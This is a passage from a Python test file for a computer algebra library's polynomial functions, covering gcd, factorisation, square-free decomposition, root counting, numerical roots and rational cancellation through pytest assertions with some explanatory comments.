f, g = x**2 + 8*x + 7, x**3 + 7*x**2 + x + 7
l = x**4 + 8*x**3 + 8*x**2 + 8*x + 7
h, s, t = x + 7, x + 1, x**2 + 1
assert cofactors(f, g, modulus=11) == (h, s, t)
assert gcd(f, g, modulus=11) == h
assert lcm(f, g, modulus=11) == l
pytest.raises(TypeError, lambda: gcd(x))
pytest.raises(TypeError, lambda: lcm(x))
F = [x**3 - 1, x**2 - 1, x**2 - 3*x + 2]
assert functools.reduce(gcd, F) == x - 1
assert functools.reduce(lambda x, y: gcd(x, y, polys=True), F) == (x - 1).as_poly()
F = [x**3 - 1, x**2 - 2, x**2 - 3*x + 2]
assert functools.reduce(gcd, F) == 1
def test_gcd_numbers_vs_polys():
assert isinstance(gcd(3, 9), Integer)
assert isinstance(gcd(3*x, 9), Integer)
assert gcd(3, 9) == 3
assert gcd(3*x, 9) == 3
assert isinstance(gcd(Rational(3, 2), Rational(9, 4)), Rational)
assert isinstance(gcd(Rational(3, 2)*x, Rational(9, 4)), Rational)
assert gcd(Rational(3, 2), Rational(9, 4)) == Rational(3, 4)
assert gcd(Rational(3, 2)*x, Rational(9, 4)) == 1
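    # For plain numbers the Rational gcd above is exact (3/4); Floats are
    # inexact, so their gcd degenerates to 1.0: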
assert isinstance(gcd(3.0, 9.0), Float)
assert isinstance(gcd(3.0*x, 9.0), Float)
assert gcd(3.0, 9.0) == 1.0
assert gcd(3.0*x, 9.0) == 1.0
def test_terms_gcd():
assert terms_gcd(1) == 1
assert terms_gcd(1, x) == 1
assert terms_gcd(x - 1) == x - 1
assert terms_gcd(-x - 1) == -x - 1
assert terms_gcd(2*x + 3) == 2*x + 3
assert terms_gcd(6*x + 4) == Mul(2, 3*x + 2, evaluate=False)
assert terms_gcd(x**3*y + x*y**3) == x*y*(x**2 + y**2)
assert terms_gcd(2*x**3*y + 2*x*y**3) == 2*x*y*(x**2 + y**2)
assert terms_gcd(x**3*y/2 + x*y**3/2) == x*y/2*(x**2 + y**2)
assert terms_gcd(x**3*y + 2*x*y**3) == x*y*(x**2 + 2*y**2)
assert terms_gcd(2*x**3*y + 4*x*y**3) == 2*x*y*(x**2 + 2*y**2)
assert terms_gcd(2*x**3*y/3 + 4*x*y**3/5) == 2*x*y/15*(5*x**2 + 6*y**2)
assert terms_gcd(2.0*x**3*y + 4.1*x*y**3) == x*y*(2.0*x**2 + 4.1*y**2)
assert terms_gcd(2.0*x + 3) == 2.0*x + 3
assert terms_gcd((3 + 3*x)*(x + x*y), expand=False) == \
(3*x + 3)*(x*y + x)
assert terms_gcd((3 + 3*x)*(x + x*sin(3 + 3*y)), expand=False, deep=True) == \
3*x*(x + 1)*(sin(Mul(3, y + 1, evaluate=False)) + 1)
assert terms_gcd(sin(x + x*y), deep=True) == \
sin(x*(y + 1))
eq = Eq(2*x, 2*y + 2*z*y)
assert terms_gcd(eq) == eq
assert terms_gcd(eq, deep=True) == Eq(2*x, 2*y*(z + 1))
def test_trunc():
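    # trunc(f, p) maps every coefficient into the symmetric residue system
    # modulo p, here {-1, 0, 1} for p == 3: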
f, g = x**5 + 2*x**4 + 3*x**3 + 4*x**2 + 5*x + 6, x**5 - x**4 + x**2 - x
F, G = f.as_poly(), g.as_poly()
assert F.trunc(3) == G
assert trunc(f, 3) == g
assert trunc(f, 3, x) == g
assert trunc(F, 3) == G
assert trunc(f, 3, polys=True) == G
assert trunc(F, 3, polys=False) == g
f, g = 6*x**5 + 5*x**4 + 4*x**3 + 3*x**2 + 2*x + 1, -x**4 + x**3 - x + 1
F, G = f.as_poly(), g.as_poly()
assert F.trunc(3) == G
assert trunc(f, 3) == g
assert trunc(f, 3, x) == g
assert trunc(F, 3) == G
assert trunc(f, 3, polys=True) == G
assert trunc(F, 3, polys=False) == g
f = (x**2 + 2*x + 3).as_poly(modulus=5)
assert f.trunc(2) == (x**2 + 1).as_poly(modulus=5)
pytest.raises(ComputationFailed, lambda: trunc([1, 2], 2))
def test_monic():
f, g = 2*x - 1, x - Rational(1, 2)
F, G = f.as_poly(domain=QQ), g.as_poly()
assert F.monic() == G
assert monic(f) == g
assert monic(f, x) == g
assert monic(F) == G
assert monic(f, polys=True) == G
assert monic(F, polys=False) == g
pytest.raises(ComputationFailed, lambda: monic(4))
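    # With auto=False the domain stays ZZ, so monic() only succeeds when the
    # leading coefficient divides every other one (2*x + 6*x + 1 == 8*x + 1
    # below fails, since 8 does not divide 1):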
assert monic(2*x**2 + 6*x + 4, auto=False) == x**2 + 3*x + 2
pytest.raises(ExactQuotientFailed, lambda: monic(2*x + 6*x + 1, auto=False))
assert monic(2.0*x**2 + 6.0*x + 4.0) == 1.0*x**2 + 3.0*x + 2.0
assert monic(2*x**2 + 3*x + 4, modulus=5) == x**2 + 4*x + 2
assert monic(x + 2) == x + 2
assert monic(2*x + 2) == x + 1
assert monic(x - 1) == x - 1
assert monic(2*x - 1) == x - Rational(1, 2)
def test_content():
f, F = 4*x + 2, (4*x + 2).as_poly()
assert F.content() == 2
assert content(f) == 2
pytest.raises(ComputationFailed, lambda: content(4))
f = (2*x).as_poly(modulus=3)
assert f.content() == 1
def test_primitive():
f, g = 4*x + 2, 2*x + 1
F, G = f.as_poly(), g.as_poly()
assert F.primitive() == (2, G)
assert primitive(f) == (2, g)
assert primitive(f, x) == (2, g)
assert primitive(F) == (2, G)
assert primitive(f, polys=True) == (2, G)
assert primitive(F, polys=False) == (2, g)
pytest.raises(ComputationFailed, lambda: primitive(4))
f = (2*x).as_poly(modulus=3)
g = (2.0*x).as_poly(domain=RR)
assert f.primitive() == (1, f)
assert g.primitive() == (1.0, g)
assert primitive(-3*x/4 + y + Rational(11, 8)) == \
(Rational(-1, 8), 6*x - 8*y - 11)
assert primitive(3*x + 2) == (1, 3*x + 2)
assert primitive(4*x + 2) == (2, 2*x + 1)
assert primitive(2*x**2 + 6*x + 12) == (2, x**2 + 3*x + 6)
assert primitive(x**2 + 3*x + 6) == (1, x**2 + 3*x + 6)
def test_compose():
f = x**12 + 20*x**10 + 150*x**8 + 500*x**6 + 625*x**4 - 2*x**3 - 10*x + 9
g = x**4 - 2*x + 9
h = x**3 + 5*x
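    # f is the functional composition g(h(x)), so decompose() recovers [g, h]: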
F, G, H = map(Poly, (f, g, h))
assert G.compose(H) == F
assert compose(g, h) == f
assert compose(g, h, x) == f
assert compose(G, H) == F
assert compose(g, h, polys=True) == F
assert compose(G, H, polys=False) == f
assert F.decompose() == [G, H]
assert decompose(f) == [g, h]
assert decompose(f, x) == [g, h]
assert decompose(F) == [G, H]
assert decompose(f, polys=True) == [G, H]
assert decompose(F, polys=False) == [g, h]
pytest.raises(ComputationFailed, lambda: compose(4, 2))
pytest.raises(ComputationFailed, lambda: decompose(4))
assert compose(x**2 - y**2, x - y, x, y) == x**2 - 2*x*y
assert compose(x**2 - y**2, x - y, y, x) == -y**2 + 2*x*y
def test_shift():
assert (x**2 - 2*x + 1).as_poly().shift(2) == (x**2 + 2*x + 1).as_poly()
def test_sqf_norm():
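    # sqf_norm(f, extension=a) returns (s, g, r) with g(x) = f(x - s*a) and
    # r = Norm(g) square-free over the rationals: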
assert sqf_norm(x**2 - 2, extension=sqrt(3)) == \
(1, x**2 - 2*sqrt(3)*x + 1, x**4 - 10*x**2 + 1)
assert sqf_norm(x**2 - 3, extension=sqrt(2)) == \
(1, x**2 - 2*sqrt(2)*x - 1, x**4 - 10*x**2 + 1)
assert sqf_norm(x**2 - 3, extension=sqrt(2), polys=True) == \
(1, (x**2 - 2*sqrt(2)*x - 1).as_poly(extension=sqrt(2)),
(x**4 - 10*x**2 + 1).as_poly())
pytest.raises(ComputationFailed, lambda: sqf_norm([1, 2]))
assert (x**2 - 2).as_poly(extension=sqrt(3)).sqf_norm() == \
(1, (x**2 - 2*sqrt(3)*x + 1).as_poly(x, extension=sqrt(3)),
(x**4 - 10*x**2 + 1).as_poly(x, domain=QQ))
assert (x**2 - 3).as_poly(extension=sqrt(2)).sqf_norm() == \
(1, (x**2 - 2*sqrt(2)*x - 1).as_poly(x, extension=sqrt(2)),
(x**4 - 10*x**2 + 1).as_poly(x, domain=QQ))
def test_sqf():
f = x**5 - x**3 - x**2 + 1
g = x**3 + 2*x**2 + 2*x + 1
h = x - 1
p = x**4 + x**3 - x - 1
F, G, H, P = map(Poly, (f, g, h, p))
assert F.sqf_part() == P
assert sqf_part(f) == p
assert sqf_part(f, x) == p
assert sqf_part(F) == P
assert sqf_part(f, polys=True) == P
assert sqf_part(F, polys=False) == p
assert F.sqf_list() == (1, [(G, 1), (H, 2)])
assert sqf_list(f) == (1, [(g, 1), (h, 2)])
assert sqf_list(f, x) == (1, [(g, 1), (h, 2)])
assert sqf_list(F) == (1, [(G, 1), (H, 2)])
assert sqf_list(f, polys=True) == (1, [(G, 1), (H, 2)])
assert sqf_list(F, polys=False) == (1, [(g, 1), (h, 2)])
pytest.raises(PolynomialError, lambda: sqf_list([1, 2]))
pytest.raises(ComputationFailed, lambda: sqf_part(4))
assert sqf(1) == 1
assert sqf_list(1) == (1, [])
assert sqf((2*x**2 + 2)**7) == 128*(x**2 + 1)**7
assert sqf(f) == g*h**2
assert sqf(f, x) == g*h**2
d = x**2 + y**2
assert sqf(f/d) == (g*h**2)/d
assert sqf(f/d, x) == (g*h**2)/d
assert sqf(x - 1) == x - 1
assert sqf(-x - 1) == -x - 1
assert sqf(x - 1) == x - 1
assert sqf(6*x - 10) == Mul(2, 3*x - 5, evaluate=False)
assert sqf((6*x - 10)/(3*x - 6)) == Rational(2, 3)*((3*x - 5)/(x - 2))
assert sqf((x**2 - 2*x + 1).as_poly()) == (x - 1)**2
f = 3 + x - x*(1 + x) + x**2
assert sqf(f) == 3
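    # Expanding (x + 1)**40000000000 is out of the question, so sqf() must
    # work with the power structure of the input directly: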
f = (x**2 + 2*x + 1)**20000000000
assert sqf(f) == (x + 1)**40000000000
assert sqf_list(f) == (1, [(x + 1, 40000000000)])
pytest.raises(PolynomialError, lambda: sqf_list(x/(x**2 - 1), frac=False))
assert sqf_list(x/(x**2 - 1), frac=True) == (1, [(x, 1)], [(x**2 - 1, 1)])
def test_factor():
f = x**5 - x**3 - x**2 + 1
u = x + 1
v = x - 1
w = x**2 + x + 1
F, U, V, W = map(Poly, (f, u, v, w))
assert F.factor_list() == (1, [(U, 1), (V, 2), (W, 1)])
assert factor_list(f) == (1, [(u, 1), (v, 2), (w, 1)])
assert factor_list(f, x) == (1, [(u, 1), (v, 2), (w, 1)])
assert factor_list(F) == (1, [(U, 1), (V, 2), (W, 1)])
assert factor_list(f, polys=True) == (1, [(U, 1), (V, 2), (W, 1)])
assert factor_list(F, polys=False) == (1, [(u, 1), (v, 2), (w, 1)])
assert factor_list(1) == (1, [])
assert factor_list(6) == (6, [])
assert factor_list(sqrt(3), x) == (1, [(3, Rational(1, 2))])
assert factor_list((-1)**x, x) == (1, [(-1, x)])
assert factor_list((2*x)**y, x) == (1, [(2, y), (x, y)])
assert factor_list(sqrt(x*y), x) == (1, [(x*y, Rational(1, 2))])
# issue sympy/sympy#11198
assert factor_list(sqrt(2)*x) == (1, [(2, Rational(1, 2)), (x, 1)])
    assert factor_list(sqrt(2)*sin(x), sin(x)) == (1, [(2, Rational(1, 2)), (sin(x), 1)])
assert factor(6) == 6 and factor(6).is_Integer
assert factor_list(3*x) == (3, [(x, 1)])
assert factor_list(3*x**2) == (3, [(x, 2)])
assert factor(3*x) == 3*x
assert factor(3*x**2) == 3*x**2
assert factor((2*x**2 + 2)**7) == 128*(x**2 + 1)**7
assert factor(f) == u*v**2*w
assert factor(f, x) == u*v**2*w
g, p, q, r = x**2 - y**2, x - y, x + y, x**2 + 1
assert factor(f/g) == (u*v**2*w)/(p*q)
assert factor(f/g, x) == (u*v**2*w)/(p*q)
p = Symbol('p', positive=True)
i = Symbol('i', integer=True)
r = Symbol('r', extended_real=True)
assert factor(sqrt(x*y)).is_Pow is True
assert factor(sqrt(3*x**2 - 3)) == sqrt(3)*sqrt((x - 1)*(x + 1))
assert factor(sqrt(3*x**2 + 3)) == sqrt(3)*sqrt(x**2 + 1)
assert factor((y*x**2 - y)**i) == y**i*(x - 1)**i*(x + 1)**i
assert factor((y*x**2 + y)**i) == y**i*(x**2 + 1)**i
assert factor((y*x**2 - y)**t) == (y*(x - 1)*(x + 1))**t
assert factor((y*x**2 + y)**t) == (y*(x**2 + 1))**t
f = sqrt(expand((r**2 + 1)*(p + 1)*(p - 1)*(p - 2)**3))
g = sqrt((p - 2)**3*(p - 1))*sqrt(p + 1)*sqrt(r**2 + 1)
assert factor(f) == g
assert factor(g) == g
g = (x - 1)**5*(r**2 + 1)
f = sqrt(expand(g))
assert factor(f) == sqrt(g)
f = (sin(1)*x + 1).as_poly(x, domain=EX)
assert f.factor_list() == (1, [(f, 1)])
f = x**4 + 1
assert factor(f) == f
assert factor(f, extension=I) == (x**2 - I)*(x**2 + I)
assert factor(f, gaussian=True) == (x**2 - I)*(x**2 + I)
assert factor(
f, extension=sqrt(2)) == (x**2 + sqrt(2)*x + 1)*(x**2 - sqrt(2)*x + 1)
f = x**2 + 2*sqrt(2)*x + 2
assert factor(f, extension=sqrt(2)) == (x + sqrt(2))**2
assert factor(f**3, extension=sqrt(2)) == (x + sqrt(2))**6
assert factor(x**2 - 2*y**2, extension=sqrt(2)) == \
(x + sqrt(2)*y)*(x - sqrt(2)*y)
assert factor(2*x**2 - 4*y**2, extension=sqrt(2)) == \
2*((x + sqrt(2)*y)*(x - sqrt(2)*y))
assert factor(x - 1) == x - 1
assert factor(-x - 1) == -x - 1
assert factor(x - 1) == x - 1
assert factor(6*x - 10) == Mul(2, 3*x - 5, evaluate=False)
assert factor(x**11 + x + 1, modulus=65537) == \
(x**2 + x + 1)*(x**9 + 65536*x**8 + x**6 + 65536*x**5 +
x**3 + 65536*x**2 + 1)
assert (factor(x**3 + 3*x + 2, modulus=4) ==
factor((x**3 + 3*x + 2).as_poly(modulus=4)) ==
(x + 1)*(x**2 + x + 2))
assert (factor_list((x**3 + 3*x + 2).as_poly(modulus=4)) ==
(1, [((x + 1).as_poly(modulus=4), 1),
((x**2 + x + 2).as_poly(modulus=4), 1)]))
f = x/pi + x*sin(x)/pi
g = y/(pi**2 + 2*pi + 1) + y*sin(x)/(pi**2 + 2*pi + 1)
assert factor(f) == x*(sin(x) + 1)/pi
assert factor(g) == y*(sin(x) + 1)/(pi + 1)**2
assert factor(Eq(
x**2 + 2*x + 1, x**3 + 1)) == Eq((x + 1)**2, (x + 1)*(x**2 - x + 1))
f = (x**2 - 1)/(x**2 + 4*x + 4)
assert factor(f) == (x + 1)*(x - 1)/(x + 2)**2
assert factor(f, x) == (x + 1)*(x - 1)/(x + 2)**2
f = 3 + x - x*(1 + x) + x**2
assert factor(f) == 3
assert factor(f, x) == 3
assert factor(1/(x**2 + 2*x + 1/x) - 1) == -((1 - x + 2*x**2 +
x**3)/(1 + 2*x**2 + x**3))
assert factor(f, expand=False) == f
pytest.raises(PolynomialError, lambda: factor(f, x, expand=False))
pytest.raises(FlagError, lambda: factor(x**2 - 1, polys=True))
assert factor([x, Eq(x**2 - y**2, Tuple(x**2 - z**2, 1/x + 1/y))]) == \
[x, Eq((x - y)*(x + y), Tuple((x - z)*(x + z), (x + y)/x/y))]
    assert not isinstance(
        (x**3 + x + 1).as_poly().factor_list()[1][0][0], PurePoly)
    assert isinstance(
        PurePoly(x**3 + x + 1).factor_list()[1][0][0], PurePoly)
assert factor(sqrt(-x)) == sqrt(-x)
# issue sympy/sympy#5917
e = (-2*x*(-x + 1)*(x - 1)*(-x*(-x + 1)*(x - 1) - x*(x - 1)**2)*(x**2*(x -
1) - x*(x - 1) - x) - (-2*x**2*(x - 1)**2 - x*(-x + 1)*(-x*(-x + 1) +
x*(x - 1)))*(x**2*(x - 1)**4 - x*(-x*(-x + 1)*(x - 1) - x*(x - 1)**2)))
assert factor(e) == 0
# deep option
assert factor(sin(x**2 + x) + x, deep=True) == sin(x*(x + 1)) + x
assert factor(sqrt(x**2)) == sqrt(x**2)
# issue sympy/sympy#7902
assert (2*Sum(3*x, (x, 1, 9))).factor() == 6*Sum(x, (x, 1, 9))
assert (2*Sum(x**2, (x, 1, 9))).factor() == 2*Sum(x**2, (x, 1, 9))
A, B = symbols('A B', commutative=False)
f = (x - A)*(y - B)
assert factor(f.expand()) == f
assert factor(Sum(4*x, (x, 1, y))) == 4*Sum(x, (x, 1, y))
# issue sympy/sympy#13149
assert (factor(expand((0.5*x + 1)*(0.5*y + 1))) ==
Mul(4.0, 0.25*x + 0.5, 0.25*y + 0.5))
assert factor(expand((0.5*x + 1)**2)) == 4.0*(0.25*x + 0.5)**2
assert factor(x**4/2 + 5*x**3/12 - x**2/3) == x**2*(2*x - 1)*(3*x + 4)/12
assert factor(x**6 - 4*x**4 + 4*x**3 - x**2) == x**2*(x - 1)**2*(x**2 + 2*x - 1)
# issue sympy/sympy#9607
assert factor(1e-20*x - 7.292115e-5) == 1e-20*x - 7.292115e-5
def test_factor_large():
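    # These exponents are far too large for the expanded forms to be
    # materialized, so factor() must exploit the power structure directly.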
f = (x**2 + 4*x + 4)**10000000*(x**2 + 1)*(x**2 + 2*x + 1)**1234567
g = ((x**2 + 2*x + 1)**3000*y**2 + (x**2 + 2*x + 1)**3000*2*y +
(x**2 + 2*x + 1)**3000)
assert factor(f) == (x + 2)**20000000*(x**2 + 1)*(x + 1)**2469134
assert factor(g) == (x + 1)**6000*(y + 1)**2
assert factor_list(f) == (1, [(x**2 + 1, 1), (x + 1, 2469134),
(x + 2, 20000000)])
assert factor_list(g) == (1, [(y + 1, 2), (x + 1, 6000)])
f = (x**2 - y**2)**200000*(x**7 + 1)
g = (x**2 + y**2)**200000*(x**7 + 1)
assert factor(f) == \
(x + 1)*(x - y)**200000*(x + y)**200000*(x**6 - x**5 +
x**4 - x**3 + x**2 - x + 1)
assert factor(g, gaussian=True) == \
(x + 1)*(x - I*y)**200000*(x + I*y)**200000*(x**6 - x**5 +
x**4 - x**3 + x**2 - x + 1)
assert factor_list(f) == \
(1, [(x + 1, 1), (x - y, 200000), (x + y, 200000), (x**6 -
x**5 + x**4 - x**3 + x**2 - x + 1, 1)])
assert factor_list(g, gaussian=True) == \
(1, [(x + 1, 1), (x - I*y, 200000), (x + I*y, 200000), (
x**6 - x**5 + x**4 - x**3 + x**2 - x + 1, 1)])
def test_factor_noeval():
assert factor(6*x - 10) == Mul(2, 3*x - 5, evaluate=False)
assert factor((6*x - 10)/(3*x - 6)) == Rational(2, 3)*((3*x - 5)/(x - 2))
def test_count_roots():
assert count_roots(x**2 - 2) == 2
assert count_roots(x**2 - 2, inf=-oo) == 2
assert count_roots(x**2 - 2, sup=+oo) == 2
assert count_roots(x**2 - 2, inf=-oo, sup=+oo) == 2
assert count_roots(x**2 - 2, inf=-2) == 2
assert count_roots(x**2 - 2, inf=-1) == 1
assert count_roots(x**2 - 2, sup=1) == 1
assert count_roots(x**2 - 2, sup=2) == 2
assert count_roots(x**2 - 2, inf=-1, sup=1) == 0
assert count_roots(x**2 - 2, inf=-2, sup=2) == 2
assert count_roots(x**2 + 2) == 0
assert count_roots(x**2 + 2, inf=-2*I) == 2
assert count_roots(x**2 + 2, sup=+2*I) == 2
assert count_roots(x**2 + 2, inf=-2*I, sup=+2*I) == 2
assert count_roots(x**2 + 2, inf=0) == 0
assert count_roots(x**2 + 2, sup=0) == 0
assert count_roots(x**2 + 2, inf=-I) == 1
assert count_roots(x**2 + 2, sup=+I) == 1
assert count_roots(x**2 + 2, inf=+I/2, sup=+I) == 0
assert count_roots(x**2 + 2, inf=-I, sup=-I/2) == 0
assert count_roots(x**2 + 1, inf=-I, sup=1) == 1
assert count_roots(x**4 - 4, inf=0, sup=1 + 3*I) == 1
pytest.raises(PolynomialError, lambda: count_roots(1))
def test_sympyissue_12602():
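    # Regression test for sympy/sympy#12602: count_roots() applied to a
    # degree-14 polynomial with enormous rational coefficients.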
expr = 11355363812949950368319856364342755712460471081301053527133568171268803160551855579764764406412332136789657466300880824616465555590045220022768132246969281371700283178427904690172215428157788636395727*t**14/500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 1182614101238502509994197939548011046110362591360244720959032955996959698293886871005468894084128139099293801809189908060595593758885614886473934547400040763077455747185622083724725964710198605960741*t**13/6250000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 12922822504467751142249299122933324184092020356108036157731097049497758652003692943810675925067800052327142015387959211427374009396705154181837176763552511140169473943304565171121276347837419884681487*t**12/1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 2247204646780185719430022273864876084706708953097666720876560045907791931848809022047384483255204086759310635258105261945382035979316693256857004274231432751741774866992749719943120236265693542959121*t**11/10000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 48361843519832766388699493325560944345496391872452676523436328806727211606456243561884964568166128629309073817110912281835520854136140406763166099011063597874739148993632932049857510934073377073756943*t**10/10000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 80164052804759260531194459240730834126540153423610579212661871973340813173703351959915044156338949310408408075892534630817446213642840221172696829016781427774802300251456296296549939454943896121381103*t**9/1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 11820298688854366697091577677719451524251323356734720588058286064886307168520540386661816641085576247246659191024148765432674755172844550760156289246049795015707597236348994207857339854655564489007679*t**8/10000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 14908242237501135776503697900202844008307102016637953004464689811953233096672981556176039254271036473296837438230462049062156575391853236190707958824171141585643979204278060814079164562347710212783143*t**7/1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 
4004804534801340363315980630036975745885352263060800540982728634021250371208042415913703863593076428445232409745085269553713246947392078483528154594010983406996758112107177357774230732091992176355051*t**6/25000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 14405532019175131023474809758591882760843355517617477976264800133366074549575009123545658907344444270748700666056555232135755778765629022007752913521423634118196613981546114590366304386999628027814879*t**5/10000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 10574051936471402714931747549059296527795248964344182731742838740900131997560377847217760142735497446739729085272580576056569967115897852649538335744262984346103108139783500273358254849041434565692381*t**4/1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 7621024600438344015600198602526834713218087596509021419939455089811715884880919464619193508300267251654333701818067555976498078593210932512841643006106774171602557804624587725019604901643333157908251*t**3/125000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 810596792271328855063337004546095119237768466927680286629788036582515398849767422695474356109018097281604030779219064519000249092915587584571381512608327847454533913096943271752401133736953700148513*t**2/3125000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 7250440010579498280072969338541700246700434564503594127678121996192953098480655821398616200867454166215020508242889954318334847876038061179796990134727332078272146610064625333734530143125317393151907*t/10000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 + 1
assert count_roots(expr) == 0
def test_Poly_root():
f = (2*x**3 - 7*x**2 + 4*x + 4).as_poly()
assert f.root(0) == -Rational(1, 2)
assert f.root(1) == 2
assert f.root(2) == 2
pytest.raises(IndexError, lambda: f.root(3))
assert (x**5 + x + 1).as_poly().root(0) == RootOf(x**3 - x**2 + 1, 0)
def test_real_roots():
assert real_roots(x) == [0]
assert real_roots(x, multiple=False) == [(0, 1)]
assert real_roots(x**3) == [0, 0, 0]
assert real_roots(x**3, multiple=False) == [(0, 3)]
assert real_roots(x*(x**3 + x + 3)) == [RootOf(x**3 + x + 3, 0), 0]
assert real_roots(x*(x**3 + x + 3), multiple=False) == [(RootOf(
x**3 + x + 3, 0), 1), (0, 1)]
assert real_roots(
x**3*(x**3 + x + 3)) == [RootOf(x**3 + x + 3, 0), 0, 0, 0]
assert real_roots(x**3*(x**3 + x + 3), multiple=False) == [(RootOf(
x**3 + x + 3, 0), 1), (0, 3)]
f = 2*x**3 - 7*x**2 + 4*x + 4
g = x**3 + x + 1
assert f.as_poly().real_roots() == [-Rational(1, 2), 2, 2]
assert g.as_poly().real_roots() == [RootOf(g, 0)]
pytest.raises(PolynomialError, lambda: real_roots(1))
def test_all_roots():
f = 2*x**3 - 7*x**2 + 4*x + 4
g = x**3 + x + 1
assert f.as_poly().all_roots() == [-Rational(1, 2), 2, 2]
assert f.as_poly().all_roots(multiple=False) == [(-Rational(1, 2), 1), (2, 2)]
assert g.as_poly().all_roots() == [RootOf(g, 0), RootOf(g, 1), RootOf(g, 2)]
f = (x**7 - x).as_poly(modulus=7)
# issue sympy/sympy#22673
assert f.all_roots() == [RootOf(f, i, evaluate=False) for i in range(7)]
def test_nroots():
assert not Integer(0).as_poly(x).nroots()
assert not Integer(1).as_poly(x).nroots()
assert (x**2 - 1).as_poly().nroots() == [-1.0, 1.0]
assert (x**2 + 1).as_poly().nroots() == [-1.0*I, 1.0*I]
roots = (x**2 - 1).as_poly().nroots()
assert roots == [-1.0, 1.0]
roots = (x**2 + 1).as_poly().nroots()
assert roots == [-1.0*I, 1.0*I]
roots = (x**2/3 - Rational(1, 3)).as_poly().nroots()
assert roots == [-1.0, 1.0]
roots = (x**2/3 + Rational(1, 3)).as_poly().nroots()
assert roots == [-1.0*I, 1.0*I]
assert (x**2 + 2*I).as_poly(x).nroots() == [-1.0 + 1.0*I, 1.0 - 1.0*I]
assert (
x**2 + 2*I).as_poly(x, extension=I).nroots() == [-1.0 + 1.0*I, 1.0 - 1.0*I]
assert (0.2*x + 0.1).as_poly().nroots() == [-0.5]
roots = nroots(x**5 + x + 1, n=5)
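    # With n=5 digits the computed roots agree with these reference values to
    # within 1e-5, but not to within 1e-6 (re-checked below):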
eps = Float('1e-5')
assert re(roots[0]).epsilon_eq(-0.75487, eps) is true
assert im(roots[0]) == 0.0
assert re(roots[1]) == -0.5
assert im(roots[1]).epsilon_eq(-0.86602, eps) is true
assert re(roots[2]) == -0.5
assert im(roots[2]).epsilon_eq(+0.86602, eps) is true
assert re(roots[3]).epsilon_eq(+0.87743, eps) is true
assert im(roots[3]).epsilon_eq(-0.74486, eps) is true
assert re(roots[4]).epsilon_eq(+0.87743, eps) is true
assert im(roots[4]).epsilon_eq(+0.74486, eps) is true
eps = Float('1e-6')
assert re(roots[0]).epsilon_eq(-0.75487, eps) is false
assert im(roots[0]) == 0.0
assert re(roots[1]) == -0.5
assert im(roots[1]).epsilon_eq(-0.86602, eps) is false
assert re(roots[2]) == -0.5
assert im(roots[2]).epsilon_eq(+0.86602, eps) is false
assert re(roots[3]).epsilon_eq(+0.87743, eps) is false
assert im(roots[3]).epsilon_eq(-0.74486, eps) is false
assert re(roots[4]).epsilon_eq(+0.87743, eps) is false
assert im(roots[4]).epsilon_eq(+0.74486, eps) is false
pytest.raises(DomainError, lambda: (x + y).as_poly(x).nroots())
pytest.raises(MultivariatePolynomialError, lambda: (x + y).as_poly().nroots())
assert nroots(x**2 - 1) == [-1.0, 1.0]
roots = nroots(x**2 - 1)
assert roots == [-1.0, 1.0]
assert nroots(x + I) == [-1.0*I]
assert nroots(x + 2*I) == [-2.0*I]
pytest.raises(PolynomialError, lambda: nroots(0))
# issue sympy/sympy#8296
f = (x**4 - 1).as_poly()
assert f.nroots(2) == [w.evalf(2) for w in f.all_roots()]
def test_cancel():
assert cancel(0) == 0
assert cancel(7) == 7
assert cancel(x) == x
assert cancel(oo) == oo
assert cancel((2, 3)) == (1, 2, 3)
assert cancel((0, 1, 2)) == (0, 1, 2)
assert cancel((1, 0), x) == (1, 1, 0)
assert cancel((0, 1), x) == (1, 0, 1)
f, g, p, q = 4*x**2 - 4, 2*x - 2, 2*x + 2, Integer(1)
F, G, P, Q = [u.as_poly(x) for u in (f, g, p, q)]
assert F.cancel(G) == (1, P, Q)
assert cancel((f, g)) == (1, p, q)
assert cancel((f, g), x) == (1, p, q)
assert cancel((F, G)) == (1, P, Q)
assert cancel((f, g), polys=True) == (1, P, Q)
assert cancel((F, G), polys=False) == (1, p, q)
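    # By default cancel() does not simplify over the algebraic extension;
    # greedy=False forces the cancellation: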
f = (x**2 - 2)/(x + sqrt(2))
assert cancel(f) == f
assert cancel(f, greedy=False) == x - sqrt(2)
f = (x**2 - 2)/(x - sqrt(2))
assert cancel(f) == f
assert cancel(f, greedy=False) == x + sqrt(2)
assert cancel((x**2/4 - 1, x/2 - 1)) == (Rational(1, 2), x + 2, 1)
assert cancel((x**2 - y)/(x - y)) == 1/(x - y)*(x**2 - y)
assert cancel((x**2 - y**2)/(x - y), x) == x + y
assert cancel((x**2 - y**2)/(x - y), y) == x + y
assert cancel((x**2 - y**2)/(x - y)) == x + y
assert cancel((x**3 - 1)/(x**2 - 1)) == (x**2 + x + 1)/(x + 1)
